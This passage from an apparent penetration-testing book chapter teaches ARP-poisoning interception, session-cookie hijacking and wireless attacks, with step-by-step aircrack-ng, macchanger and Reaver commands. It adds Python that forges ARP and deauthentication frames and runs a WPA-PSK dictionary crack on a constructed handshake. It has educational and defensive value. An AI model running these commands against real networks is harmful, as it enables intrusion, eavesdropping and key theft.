Step 5—Next, we need to choose our targets. In this case, I would like to sniff the traffic between my victim host, a Windows XP machine on 192.168.75.142, and our default gateway, 192.168.75.2. We add 192.168.75.142 to target 1 and 192.168.75.2 to target 2.

Step 6—Next, click on the “Mitm” menu at the top, click on “ARP poisoning,” and then click “OK” to launch the attack.

Step 7—From the following screenshot, you can see that we are capturing all the traffic going to and from the default gateway and the victim.

Step 8—Finally, click on “Start sniffing,” and it will start sniffing the traffic. We can check whether the ARP caches have been successfully poisoned by using the “chk_poison” plug-in from Ettercap. To use this plug-in, open the “Plugins” menu at the top, and it will display several plug-ins:

Just double-click on the “chk_poison” plug-in, and it will tell you whether the poisoning is successful. It will show you the following output:

Next, we can use Wireshark to capture all the traffic between the victim’s machine and the default gateway like we did earlier. We can also launch a denial-of-service attack, which I talked about earlier, by using the “dos_attack” plug-in. Another interesting plug-in is “autoadd,” which automatically adds any new hosts it finds on your network as targets.

Hijacking Session with MITM Attack
So far, we have used MITM attacks only to capture plain-text passwords. However, we can also use them to steal session tokens/cookies, which are responsible for authenticating a user on a website. We should understand that this attack only works where the communication is performed over plain HTTP, that is, where end-to-end encryption is not in use. It won’t work where communications are encrypted (HTTPS), unless the site sets its session cookie without the Secure flag and the browser can be made to send it in an HTTP request.

Attack Scenario
Since we will use ARP spoofing to get in the middle of the communication, this attack works only when the attacker and victim are on the same local area network. It could be that an attacker has compromised a target and is using it to sniff the traffic of computers on the compromised box’s local area network; it could be a coffee shop where the attacker and the victim are already on the same local area network; or it could be that the attacker has physically plugged a laptop into the same local area network.

The attack we will perform is divided into three parts:

Part 1—We will use Cain and Abel to perform an ARP spoofing attack. Cain and Abel is a Windows-based tool that is most commonly used as a password cracker and for ARP spoofing (which it calls APR, ARP Poison Routing).

Part 2—Once we have successfully ARP-poisoned the network, all the victim’s traffic is routed through us. We will open our favorite packet-capturing tool, Wireshark, to capture all the traffic, and we will specifically look for the victim’s cookies to hijack the session.

Part 3—Finally, we will use a cookie injector to inject the cookies into our browser so that we can take over the victim’s session.

ARP Poisoning with Cain and Abel
So let me walk you through the process of ARP poisoning a network with Cain and Abel. For simplicity, I have divided the process into five steps:

Step 1—Download Cain and Abel from the following link, install it, and launch it: http://oxid.it/cain.html

Step 2—Turn on the sniffer by clicking on the green button at the top, just above the decoder tab. Next, scan for the MAC addresses by clicking on the plus sign (+) at the top. This will list all the hosts inside our subnet. Alternatively, you can also define your own range and set your targets.

Step 3—Once you have scanned all the MAC addresses and IP addresses, it is time to perform the ARP spoofing attack. To do that, click on the “APR” tab at the bottom and then click on the white area in the top frame. This will turn the “+” sign blue.

Step 4—Next, click on the “+” sign; a list of hosts will appear. Select the two hosts between which you want to intercept the traffic. In my case, on the left side is my default gateway and on the right are my victim hosts.

Step 5—Click “OK” and then finally click on the yellow button just under the file menu. It will begin poisoning the routes within a short time, and you will start to see traffic being captured by Cain and Abel.
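As an added example (not code from the book, Ettercap or Cain and Abel), here is what the ARP poisoning step in both tools puts on the wire, and the kind of check chk_poison relies on: the two forged “is-at” replies a man-in-the-middle sends, built byte by byte, and a small watcher that flags an IP address whose MAC suddenly changes. All addresses are constructed; the frames are only built in memory, not sent.

```python
import ipaddress
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None):
    """Ethernet II frame carrying an ARP packet (RFC 826 layout, 42 bytes)."""
    eth = mac_to_bytes(dst_mac or target_mac) + mac_to_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # htype=Ethernet, ptype=IPv4, hlen, plen, opcode
    arp += mac_to_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_to_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not an ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": bytes_to_mac(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": bytes_to_mac(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


def poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The pair of replies a MITM sends: tell the victim the gateway is at the attacker's
    MAC, and tell the gateway the victim is at the attacker's MAC (target 1 / target 2)."""
    to_victim = build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return [to_victim, to_gateway]


class ArpWatch:
    """Flag any ARP sender whose IP was previously bound to a different MAC."""

    def __init__(self):
        self.bindings = {}   # ip -> mac as first seen

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.bindings.setdefault(ip, mac)
        if known != mac:
            return f"{ip} changed from {known} to {mac} (possible ARP poisoning)"
        return None


def demo():
    """A legitimate ARP exchange followed by the two forged replies; returns the alerts."""
    victim_mac, victim_ip = "00:0c:29:aa:bb:cc", "192.168.75.142"     # constructed
    gateway_mac, gateway_ip = "00:50:56:e4:11:22", "192.168.75.2"     # constructed
    attacker_mac = "00:0c:29:de:ad:01"                                 # constructed
    watch = ArpWatch()
    legit = [
        build_arp(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gateway_ip, dst_mac=BROADCAST),
        build_arp(ARP_REPLY, gateway_mac, gateway_ip, victim_mac, victim_ip),
    ]
    forged = poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip)
    return [watch.observe(f) for f in legit + forged]


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The watcher is the same idea as arpwatch or Ettercap’s arp_cop: a static ARP table on the gateway and the victim would refuse these replies altogether, and dynamic ARP inspection on a managed switch drops them at the port.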

Wireless Hacking
Requirements
◾ Wireless access point
◾ Wireless adapter supporting packet injection

These two things are all we require to replicate what is discussed in this chapter. The access point is required because we don’t want to attack a neighbor’s access point; that would be unethical, and as a penetration tester or an ethical hacker you should make sure that you stay within your authorization. The second and most important requirement is a wireless adapter that supports packet injection and is also able to sniff in monitor mode. Personally, I use the Alfa AWUS036H wireless adapter; it not only supports packet injection, but BackTrack also has its drivers preinstalled, so we don’t have to do the tedious job of downloading and installing them.

Once you have an Alfa network adapter that supports packet injection and has all drivers installed, you can connect the adapter to your computer; since we are running BackTrack in a virtual machine, we need to attach the network adapter to the BackTrack VM. This can be done by going to VM → Removable Devices → Realtek RTL8187_Wireless and clicking the “Connect (Disconnect from host)” option.

Next, we execute the “iwconfig” command to confirm that our BackTrack machine has detected our network adapter.

Our BackTrack machine has managed to detect our wireless network adapter; however, as we can see, it is not associated with any access point. We can use the WICD network manager from Applications → Internet → Wicd Network Manager to check the available wireless networks.

Once we have connected to the appropriate access point and executed “iwconfig”, we see that the wlan0 interface now shows the ESSID, the access point’s MAC address, etc.

Introducing Aircrack-ng
Aircrack-ng is the heart of this chapter; it is a suite of tools widely used to crack/recover WEP and WPA/WPA2-PSK keys. It supports various attacks such as PTW, which can recover a WEP key from a smaller number of initialization vectors, and dictionary/brute-force attacks, which can be used against WPA/WPA2-PSK. It includes a wide variety of tools such as a packet sniffer and a packet injector. The most commonly used ones are airodump-ng, aireplay-ng, and airmon-ng.

Uncovering Hidden SSIDs
It is common practice for network administrators to disable SSID broadcasting. Normally, the SSID is sent in beacon frames, but this does not happen when a network administrator hides the SSID. Many network administrators consider this a good security practice; however, it fails in real-world situations, because any time a client (re)associates with the access point, it sends the SSID in plain text in its probe request and association request, which reveals the real SSID. We have two ways to catch this: the first is to keep capturing management frames and wait for a client to disconnect and reconnect to the access point; the second is to send deauthentication frames (a deauthentication attack), which forces everyone on the network to disconnect and then reconnect to the access point, revealing the SSID to us. So let’s see this in action.

Turning on Monitor Mode
The next thing we want to do is switch our network card into monitor mode. As mentioned in the “Network Sniffing” chapter (Chapter 6), to sniff on wired networks we need to switch our network card into promiscuous mode. However, to sniff on wireless networks, we need to make sure that our network card is in monitor mode. One of the advantages of the Alfa card is that it supports monitor mode, so make sure that your network card is able to sniff in monitor mode for this to work. We can use the following command to put the card into monitor mode:

airmon-ng start wlan0

So now we can see that we have successfully enabled monitor mode on the mon0 interface. We can use the iwconfig command to confirm which interfaces have monitor mode enabled.

Page 39


Monitoring Beacon Frames in Wireshark
Now that we have monitor mode enabled, we sniff on the mon0 interface, which shows us beacon frames containing the SSIDs being broadcast. If an SSID is not broadcast, it won’t show up there.

We selected the appropriate interface to sniff on, and we are now able to see beacon frames from access points we are not associated with. Whenever a client authenticates against the access point with the hidden SSID, it sends the SSID parameter; therefore, we can easily figure out what the real SSID is.

Monitoring with Airodump-ng
The easier way is to use airodump-ng to start monitoring the traffic; as soon as a client authenticates, the SSID will be revealed. Command:

airodump-ng mon0

An access point that is not broadcasting its ESSID appears with a name such as “<length: 0>”; as soon as a client re-authenticates, the hidden SSID appears.

Speeding Up the Process
In case we don’t want to wait for a client to disconnect and reconnect, we can perform a deauthentication attack as explained earlier to force all the clients associated with the target access point to disconnect and then reconnect. Command:

aireplay-ng -0 3 -a <MAC address of the AP> mon0

The -0 selects the deauthentication attack, followed by the count 3, which sends three bursts of deauthentication frames (aireplay-ng sends a batch of frames per count; a count of 0 keeps sending until stopped). Because no client is given with -c, the frames go to the broadcast address and hit every station. The -a parameter specifies the MAC address of the target access point, which in this case is 64:70:02:8A:12:94, followed by our interface mon0.

Bypassing MAC Filters on Wireless Networks
Apart from hiding the SSID, it is also common practice for network administrators to apply MAC filtering on the access point so that only white-listed MAC addresses are able to connect. This is done in colleges and universities where they only want registered students to have Internet access. MAC filtering, like hiding the SSID, is low-level security; and just like the hidden SSID, it fails in the real world, since an attacker can spoof a legitimate client’s MAC address to connect to the access point. Here is how this attack is carried out:

1. The attacker scans the access point for hosts that are already connected to it.
2. The attacker notes down the MAC address of a legitimate client that is connected to the access point and spoofs that MAC address to get onto the white list, so that he is able to connect and use the access point.

So here is how we combine airodump-ng and macchanger to bypass MAC filtering restrictions:

Note: Make sure that you already have monitor mode enabled before performing the following steps.

Step 1—The first command we use is airodump-ng to scan for all the neighboring networks. To demonstrate this attack, we assume that the access point with ESSID “ROMEO” and BSSID “F4:3E:61:9C:77:3B” has MAC filtering enabled and only a set of allowed MAC addresses is able to connect to it.

Step 2—The next step is to find a client that is already associated with the access point. We use airodump-ng to find it for us. Command:

airodump-ng -c 1 -a --bssid F4:3E:61:9C:77:3B mon0

Since the access point is on channel 1, we pass -c 1; --bssid restricts the capture to our target; and the -a parameter filters out unassociated clients, so only the stations currently associated with the access point are displayed.

The output shows us that two stations are currently up, with MAC addresses B0:D0:9C:5C:EF:86 and 48:DC:FB:B1:F3:7D.

Step 3—The final step is to spoof our MAC address and change it to one of the clients’. We can use a neat program in BackTrack called macchanger, but for that we first need to stop monitor mode and take the interface down, since macchanger refuses to change the address of an interface that is up. Commands:

airmon-ng stop mon0
ifconfig wlan0 down

Next, we use the following command to spoof our current MAC address:

macchanger -m B0:D0:9C:5C:EF:86 wlan0

The MAC address of the client, B0:D0:9C:5C:EF:86, is already associated with the access point. Finally, we issue the following command to bring the wlan0 interface up. Command:

ifconfig wlan0 up

We can verify that our MAC address has been spoofed by executing the iwconfig (or ifconfig) command and checking the HWaddr field.
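The hidden-SSID and deauthentication steps above both come down to a few bytes in 802.11 management frames. The following is an added example, not code from the book or from the aircrack-ng project: it builds beacon and deauthentication frames the way an access point (or aireplay-ng -0) would, and reads the SSID tag back the way airodump-ng does, including the “<length: 0>” case. MAC addresses and SSIDs are made up, and nothing is transmitted.

```python
import struct

# Frame control values, little-endian: type 0 (management), subtype in the high nibble of byte 0
FC_BEACON = 0x0080        # subtype 8
FC_PROBE_RESP = 0x0050    # subtype 5
FC_DEAUTH = 0x00C0        # subtype 12
BROADCAST = "ff:ff:ff:ff:ff:ff"
TAG_SSID = 0
REASON_CLASS3_FRAME = 7   # "class 3 frame received from nonassociated station", the code aireplay-ng uses


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def macstr(b):
    return ":".join(f"{x:02x}" for x in b)


def mgmt_header(fc, addr1, addr2, bssid, seq=0):
    """24-byte 802.11 management header: FC, duration, DA, SA, BSSID, sequence control."""
    return struct.pack("<HH", fc, 0) + mac(addr1) + mac(addr2) + mac(bssid) + struct.pack("<H", seq << 4)


def build_beacon(bssid, ssid, interval=100):
    """Beacon: fixed parameters, then the SSID tag and a supported-rates tag."""
    fixed = struct.pack("<QHH", 0, interval, 0x0011)   # timestamp, beacon interval, capability (ESS+privacy)
    tags = bytes([TAG_SSID, len(ssid)]) + ssid + bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])
    return mgmt_header(FC_BEACON, BROADCAST, bssid, bssid) + fixed + tags


def build_deauth(bssid, client=BROADCAST, reason=REASON_CLASS3_FRAME):
    """Deauthentication frame forged 'from' the AP to one client, or to everyone via broadcast.
    It is 26 bytes and carries no authentication at all, which is why any station can send it."""
    return mgmt_header(FC_DEAUTH, client, bssid, bssid) + struct.pack("<H", reason)


def parse_mgmt(frame):
    if len(frame) < 24:
        return None
    fc = struct.unpack("<H", frame[0:2])[0]
    return {"type": (fc >> 2) & 3, "subtype": (fc >> 4) & 0xF,
            "addr1": macstr(frame[4:10]), "addr2": macstr(frame[10:16]),
            "bssid": macstr(frame[16:22]), "body": frame[24:]}


def ssid_of(frame):
    """SSID from a beacon or probe response; a hidden SSID is reported the way airodump-ng shows it."""
    m = parse_mgmt(frame)
    if m is None or m["type"] != 0 or m["subtype"] not in (5, 8):
        return None
    body = m["body"][12:]          # skip timestamp, interval, capability
    i = 0
    while i + 2 <= len(body):      # walk the tagged parameters: id, length, value
        tag, ln = body[i], body[i + 1]
        val = body[i + 2:i + 2 + ln]
        if tag == TAG_SSID:
            if ln == 0 or val == b"\x00" * ln:   # zero-length or all-NUL SSID: "hidden"
                return f"<length: {ln}>"
            return val.decode("utf-8", "replace")
        i += 2 + ln
    return None


def deauth_reason(frame):
    """Reason code if this is a deauthentication frame, else None."""
    m = parse_mgmt(frame)
    if m and m["type"] == 0 and m["subtype"] == 12 and len(m["body"]) >= 2:
        return struct.unpack("<H", m["body"][:2])[0]
    return None


if __name__ == "__main__":
    ap = "64:70:02:8a:12:94"
    print(ssid_of(build_beacon(ap, b"Linksys")), ssid_of(build_beacon(ap, b"")))
    print(deauth_reason(build_deauth(ap)))
```

Two things the bytes make obvious: a “hidden” network is just a beacon with an empty SSID tag, so the name is only as secret as the next probe request; and the deauthentication frame is unauthenticated, which is what makes both the hidden-SSID trick and the WPA handshake capture later in this chapter work (802.11w management frame protection is the countermeasure, but it is outside this chapter).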

So far, we have only discussed bypassing low-level security on wireless networks, like uncovering hidden SSIDs and bypassing MAC filters. Now we will dive into the main part of this chapter, where we discuss cracking WEP, WPA, and WPA2 keys.

Cracking a WEP Wireless Network with Aircrack-ng
WEP (Wired Equivalent Privacy) was one of the first authentication and encryption mechanisms used for wireless networks; it has been known to be insecure for over a decade due to cryptographic weaknesses related to its initialization vectors, key management, etc., which we won’t discuss in this book, since it is a completely different topic. Though it is deprecated and should never be used, we still see it in lots of home networks, one reason being the use of very old routers that don’t support WPA/WPA2, the other being lack of awareness. So in this section, we will use aircrack-ng to demonstrate how easy it is to crack a WEP key, no matter how complex it is.

Placing Your Wireless Adapter in Monitor Mode
Step 1—First things first: we need to make sure that our network card is placed in monitor mode; we have already learned that we can use the “airmon-ng start wlan0” command to accomplish this task. We can use “iwconfig” to verify that our wireless adapter is now able to sniff in monitor mode.

Determining the Target with Airodump-ng
Step 2—Next, we use airodump-ng to discover neighboring networks with WEP encryption enabled. We can see our target with an ESSID (same as SSID) of “Linksys” and a BSSID of 98:FC:11:C9:14:22, and it is on channel 6. We should make a note of the ESSID, BSSID, and channel because we will need them later. Command:

airodump-ng mon0

Attacking the Target
Step 3—In order to crack the WEP key, we need to capture data frames from the target and write them to a file that we can analyze later. To accomplish this, we use airodump-ng and restrict our monitoring to the access point (AP) we are targeting. Structure:

airodump-ng --bssid <BSSID> -c <channel> -w <file name prefix> mon0

Command:

airodump-ng --bssid 98:fc:11:c9:14:22 --channel 6 --write RHAWEP mon0

We specified the BSSID of the target, which we learned in the previous step, followed by the channel the access point is on (channel 6, also from the previous step). The reason we lock it to channel 6 is that we don’t want our wireless card to hop between channels. Then we instruct it to write the results to files prefixed RHAWEP. airodump-ng writes several formats, such as .csv, .kismet.csv, and .cap, so that the capture can be analyzed with different tools. What we are interested in is the contents of the .cap file.

Speeding Up the Cracking Process
Step 4—In order to crack the WEP key, we need data packets, but waiting for them to accumulate on their own is time consuming. To speed things up, we first perform a fake authentication attack, which associates our MAC address with the access point so that it will accept the frames we inject. This step is essential when no client is associated with the access point, because the AP discards injected frames from a station that is not associated. Structure:

aireplay-ng -1 <re-association delay in seconds> -a <BSSID of the target> -h <our MAC address> <interface>

Command:

aireplay-ng -1 3 -a 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

The -1 parameter selects the fake authentication attack; the number that follows is the delay in seconds between re-authentications (0 authenticates once), not a packet count; then comes -a followed by the BSSID of the target, -h with the MAC address of our monitor interface, and the interface, which is mon0.

Injecting ARP Packets
Step 5—The success of our attack depends on the number of initialization vectors (IVs) we gather. A fake authentication attack does not generate any data frames, so we use attack number 3, “ARP request replay,” which is the most effective way of making the access point generate new IVs: every replayed ARP request is answered with a freshly encrypted frame. Structure:

aireplay-ng -3 -b <BSSID of the target> -h <MAC address of mon0> <interface>

Command:

aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

The -3 stands for the ARP request replay attack, followed by the -b parameter, which is the BSSID of the target. The -h parameter is the MAC address of our mon0 interface. Now we wait for the number of data packets (the #Data column in airodump-ng) to reach at least 20,000; the more packets we collect, the more quickly the key can be recovered.
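As an added illustration that is not part of the book, here is a minimal model of what those data packets contain and why collecting them matters. Each WEP frame is RC4-encrypted under the 24-bit IV prepended to the secret key, the IV travels in the clear, and a frame whose plaintext is predictable (an ARP frame starts with a fixed LLC/SNAP header, one reason ARP replay is the injection of choice) hands over the keystream for its IV. The key is the one the chapter recovers in the next step; everything else is constructed. This is not how aircrack-ng’s PTW attack recovers the key; it only shows the encapsulation the attack exploits.

```python
import struct
import zlib


def rc4(key, data):
    """Plain RC4 (KSA + PRGA), the stream cipher WEP uses."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:                             # pseudo-random generation, XORed with the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext, key_id=0):
    """WEP body: IV(3) || key-id byte || RC4_{IV||key}(plaintext || CRC-32 ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13), "40- or 104-bit key, 24-bit IV"
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv)


def wep_decrypt(key, body):
    """Return the plaintext, or None when the ICV does not match (wrong key or damaged frame)."""
    iv, ciphertext = body[:3], body[4:]
    clear = rc4(iv + key, ciphertext)
    data, icv = clear[:-4], clear[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        return None
    return data


def keystream_from_known_plaintext(body, known_plaintext):
    """Without the key: keystream bytes for this IV = ciphertext XOR predictable plaintext."""
    ciphertext = body[4:4 + len(known_plaintext)]
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


# Every encrypted ARP frame begins with this fixed LLC/SNAP header (ethertype 0x0806).
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def demo():
    key = bytes.fromhex("c36ee8f782")          # the 40-bit key recovered in the chapter
    iv = b"\x01\x02\x03"                       # constructed IV
    arp_request = LLC_SNAP_ARP + bytes.fromhex("0001080006040001") + b"\x00" * 20   # constructed
    body = wep_encrypt(key, iv, arp_request)
    ks = keystream_from_known_plaintext(body, LLC_SNAP_ARP)
    return {
        "iv_in_clear": body[:3] == iv,
        "decrypts": wep_decrypt(key, body) == arp_request,
        "wrong_key_rejected": wep_decrypt(b"\x00" * 5, body) is None,
        # The recovered bytes are exactly RC4(IV||key)'s first output bytes: computed here
        # with the key only to show that the attacker got them without it.
        "keystream_recovered": ks == rc4(iv + key, b"\x00" * len(ks)),
    }


if __name__ == "__main__":
    print(demo())
```

The IV is the only thing that changes from frame to frame under a fixed key, and with 24 bits it repeats quickly on a busy network; every captured frame therefore gives aircrack-ng one more (IV, first keystream bytes) pair, which is what the statistical key recovery in step 6 consumes.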

Cracking the WEP Key
Step 6—Finally, it is time to recover the key from the RHAWEP-01.cap file. We use aircrack-ng to do this. Command:

aircrack-ng RHAWEP-01.cap

So, we have successfully recovered the key, which is C3:6E:E8:F7:82. Just remove the colons from the output and you are left with the original WEP key, which in this case is C36EE8F782.

Cracking a WPA/WPA2 Wireless Network Using Aircrack-ng
WEP’s weaknesses were public by 2001, and WPA was introduced in 2003 as an interim industry standard, using TKIP for data encryption. WPA2 (IEEE 802.11i, 2004) later became the standard, since it introduced AES-CCMP encryption, which is much stronger than TKIP; for compatibility it also still supports TKIP. The WPA/WPA2 passphrase we use to authenticate on a wireless network is never used directly: it is first stretched together with the SSID into a 256-bit pairwise master key (PMK), and then four more values are mixed in to generate a unique per-session key (the pairwise transient key, PTK). Those values are the authenticator nonce (ANonce), the supplicant nonce (SNonce), the authenticator MAC address (access point MAC), and the supplicant MAC address (Wi-Fi client MAC), all of which are exchanged in the clear during the four-way handshake.

From a hacker’s perspective, we can use a brute-force attack, a dictionary attack, or rainbow tables to crack a WPA/WPA2 network. A dictionary attack is much less time consuming than the other attacks; therefore it should be your first preference. The success rate of this attack depends on the wordlist you use. Note that because the SSID is mixed into the PMK, rainbow tables are only useful for the SSID they were built for. Another requirement for this attack is the four-way handshake, which takes place between a client and an access point and which we will capture with the help of a deauthentication attack. Let’s see how we can use aircrack-ng to crack a WPA/WPA2 network:

Step 1—First of all, ensure that your network card is in monitor mode.

Step 2—Next, we listen on the mon0 interface for access points with encryption set to either WPA or WPA2. We use the “airodump-ng mon0” command to do it.

Our target AP is Shaxter, which uses WPA as its encryption type. We take note of its BSSID and the channel it is on; this information will be needed in the upcoming steps.

BSSID: F4:3E:61:92:68:D7
Channel: 6

Capturing Packets
Step 3—Next, we need to save the data associated with our access point to a specific file. The inputs we need to specify are the channel, the BSSID, and the file name prefix to write. Command:

airodump-ng -c 6 -w rhawap --bssid F4:3E:61:92:68:D7 mon0

◾ -w: file name prefix to write
◾ -c: channel (6, as noted above)

Capturing the Four-Way Handshake
Step 4—In order to successfully crack WPA, we need to capture the four-way handshake. As mentioned, to achieve this we can use a deauthentication attack to force a client to disconnect and reconnect to the access point. Structure:

aireplay-ng --deauth 10 -a <BSSID of the target AP> -c <MAC address of an associated client> mon0

Command:

aireplay-ng --deauth 10 -a F4:3E:61:92:68:D7 -c 94:39:E5:EA:85:31 mon0

Note that -c takes the MAC address of the client we want to kick off, not that of our own mon0 interface; take it from the station list that airodump-ng shows under the target AP. After we have successfully performed the deauthentication attack and the client reconnects, airodump-ng shows “WPA handshake: F4:3E:61:92:68:D7” in its top-right corner, meaning that the four-way handshake has been captured.

Cracking WPA/WPA2
Now that we have all the inputs required for cracking the WPA/WPA2 PSK, we use aircrack-ng and specify a wordlist to be tried against the rhawap-01.cap file that was generated earlier. Remember that in order to successfully crack the WPA/WPA2 PSK, we need to make sure that our capture contains the four-way handshake. Structure:

aircrack-ng -w <wordlist> <capture file>.cap

Command:

aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst rhawap-01.cap

This starts the dictionary attack against the rhawap-01.cap file, and if the key is found in the dictionary, it will be revealed to us.
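The following is an added example, not code from the book or from aircrack-ng, of exactly what aircrack-ng computes for each wordlist entry against the captured handshake: the PMK from passphrase and SSID with PBKDF2-HMAC-SHA1 (4096 rounds), the PTK from PMK, both MACs and both nonces, and a check of the captured EAPOL-Key MIC with the KCK. Because the example has no real capture, it constructs message 2 of the handshake from a known passphrase (the SSID “Shaxter” and the two MAC addresses are the chapter’s; the nonces are random) and then recovers the passphrase from it.

```python
import hashlib
import hmac
import os
import struct


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(MACs) || max(MACs) || min(nonces) || max(nonces))."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):   # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]      # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck, eapol_frame):
    """Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes,
    over the whole EAPOL-Key frame with the MIC field (bytes 81..96) zeroed."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(hs, wordlist):
    """Return the first passphrase whose KCK reproduces the captured MIC, or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


def build_demo_handshake(passphrase, ssid="Shaxter"):
    """Constructed message 2 of the four-way handshake (client -> AP) for a known passphrase."""
    ap_mac = bytes.fromhex("f43e619268d7")       # the chapter's target BSSID
    client_mac = bytes.fromhex("9439e5ea8531")   # the chapter's client MAC
    anonce, snonce = os.urandom(32), os.urandom(32)
    key_info = 0x010A   # descriptor version 2 | pairwise key | MIC present
    body = struct.pack("!BHH", 2, key_info, 16)                  # descriptor type (RSN), key info, key length
    body += b"\x00" * 7 + b"\x01"                                # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # key nonce, key IV, key RSC, key ID
    body += b"\x00" * 16 + struct.pack("!H", 0)                  # MIC placeholder, key data length
    eapol = struct.pack("!BBH", 2, 3, len(body)) + body          # EAPOL version 2, type 3 (EAPOL-Key)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:81] + mic + eapol[97:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}


if __name__ == "__main__":
    hs = build_demo_handshake("correct horse battery")
    print(crack_psk(hs, ["password", "12345678", "correct horse battery", "letmein"]))
```

Everything the check needs (SSID, both MACs, both nonces, and the MIC of message 2) is in the clear in the capture, so the only secret is the passphrase; the 4096-round PBKDF2 is what makes each guess cost something, and it is also why the attack is offline and invisible to the access point once the handshake is captured.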

Using Reaver to Crack WPS-Enabled Wireless Networks
Reaver is the penetration tester’s tool of choice against WPS; it can recover WPA/WPA2 keys within a matter of hours. Reaver does not perform a brute-force attack against the WPA/WPA2 key itself, but against the WPS PIN. WPS PINs are eight digits long, and as many routers ship with default PINs, they can easily be compromised. Even when a brute-force attack is needed, it won’t take long: the eighth digit is a checksum computed from the first seven (so only 10^7 PINs are possible in principle), and, more importantly, the access point confirms the first four digits and the last three digits separately during the WPS exchange, so an attacker needs at most 10^4 + 10^3 = 11,000 attempts rather than 10^7. Once Reaver has found the PIN, either from a default list or by brute force, it is authenticated as a valid external registrar. A registrar has access to all the configuration of the access point, which includes the WPA/WPA2 keys. For this attack to work, the access point must have WPS enabled; the good news (for us) is that it is enabled by default on most of the access points we encounter. Let’s see how we can use Reaver to crack WPS-enabled wireless networks.

Step 1—Make sure that your wireless card is in monitor mode.

Step 2—Next, we use airodump-ng to select the target we want to attack.

In this case we target the access point with ESSID PTCL-BB and BSSID F4:3E:61:F5:FC:49. We copy the BSSID, since this is the only input Reaver requires besides the interface.

Step 3—Now, we use Reaver to attack our access point. The command is as follows:

reaver -i mon0 -b F4:3E:61:F5:FC:49 -vv

The -i parameter specifies the interface, which is mon0, followed by the -b parameter, which defines the BSSID, and -vv for verbosity. With two v’s, Reaver displays each PIN as it is tried against the access point.

Reducing the Delay
We can tweak Reaver to reduce the delay between PIN attempts. The default delay is 1 s, but we can reduce it to 0 by specifying the -d parameter. Keep in mind that some access points lock WPS after a number of failed attempts, and a more aggressive rate reaches that lock-out sooner.
